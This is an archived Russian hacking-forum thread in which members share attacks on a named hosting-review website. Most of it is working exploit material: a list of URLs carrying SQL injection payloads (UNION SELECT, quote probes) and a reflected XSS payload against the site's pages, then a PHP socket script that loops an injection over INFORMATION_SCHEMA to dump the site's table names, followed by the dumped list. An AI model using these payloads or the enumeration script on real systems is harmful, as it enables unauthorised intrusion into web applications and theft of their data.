Уязвимочти hostobzor.ru ( Дубль 2 ) [Архив]

Просмотр полной версии : Уязвимочти hostobzor.ru ( Дубль 2 )

Sharky

13.01.2007, 22:27

Вот опять вам на обзор :
http://www.hostobzor.ru/db/news.php?id=666
http://www.hostobzor.ru/db/resell.php?pid=-1+UNION+SELECT+CHAR(48,49,50,51,52,53,54,55,56,57, 58,59,60),2,999/*
http://www.hostobzor.ru/db/list_news_prov.php?pid=12%27
http://www.hostobzor.ru/db/domen.php?pid=-372+UNION+SELECT+1,2,3/*
http://www.hostobzor.ru/db/vds.php?pid=-1+union+select+1,2,3/*
http://www.hostobzor.ru/db/vds.php?pid=-1%27
http://www.hostobzor.ru/db/hosting.php?pid=-1%27
http://www.hostobzor.ru/list_sites/index.php?offset=120%27&poffset=3
http://www.hostobzor.ru/db/resell.php?pid=266%27
http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153&id=611%27
http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153%27&id=611
http://www.hostobzor.ru/list_sites/index.php?offset=120%27&poffset=3
http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23/*
http://www.hostobzor.ru/db/domen.php?pid=-1%27
http://www.hostobzor.ru/db/adm_op.php
http://www.hostobzor.ru/db/hosting.php?pid=392+and(1=3)+UNION+SELECT+1,2,3/*
Вот опять та же xss-ка
http://hostobzor.ru/db/list_col.php?dc=%3Cscript%3Ealert(666)%3C/script%3E

Если не жалко дайте +

Spyder

13.01.2007, 22:46

отпостил аж в двух темах =)
поставлю тебе +

LAMAREZ

14.01.2007, 06:11

<?
echo "<pre>";
//http://www.hostobzor.ru/db/vds.php?pid=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(TABLE_NAME, 0x71),0x71),1,22+from+INFORMATION_SCHEMA.TABLES+li mit+90,1/*
for($i=0;$i<90;$i++)
{
$port = 80;
$address = gethostbyname ('www.hostobzor.ru');
$socket = socket_create (AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($socket, $address, $port);
socket_write($socket, "GET /db/vds.php?pid=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(TABLE_NAME, 0x71),0x71),1,22+from+INFORMATION_SCHEMA.TABLES+li mit+$i,1/* HTTP/1.0\n\n");
$result = "";
$result=socket_read($socket, 455);//340
$result=substr_replace($result, NULL, 0, 315);//303
$patern = "#<[\s]*title[\s]*>([^<]*)<[\s]*/title[\s]*>#i";
if(preg_match($patern, $result, $rez)) echo "\n".str_replace(" - виртуальный выделенный сервер | Хостинг Обзор - эпицентр русскоязычного хостинга", null, $rez[1]);
else echo "\n"."траблы с ID $i";
socket_close ($socket);
}
echo "\n</pre>";
//copyright by lamarez))
?>

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
VIEWS
USER_PRIVILEGES
ambulance
auction
auction_detail
auction_link
bl_main
bloklist
bloklist_global
board
calc_list_option
calc_opts
calc_ts
congratulations
db_colocation
db_dedication
db_delete
db_domen
db_host
db_list_city
db_list_zone
db_main
db_main_tmp
db_op
db_park
db_resell
db_sites
db_vds
din_cena
din_services
domenstat
forbusy
free
hotline
hotline_arch
ip2country
list_sites
minus_fb
minus_url
minus_xml
new_hoststat
new_hoststat_runs
news_comm
news_my
news_prov
news_site
opinion
panels
partners
prihod
st_access
st_filter_col
st_filter_ded
st_filter_dom
st_filter_firm
st_filter_vs
st_filter_vvs
st_plan_col
st_plan_ded
st_plan_park
st_plan_vs
st_plan_vvs
st_profile
st_service
st_tracert
st_view_board
st_view_news
stat_ipprov
statistic
statistic_log
subscr
tld_geo
votelist
votes
xml_export
xml_import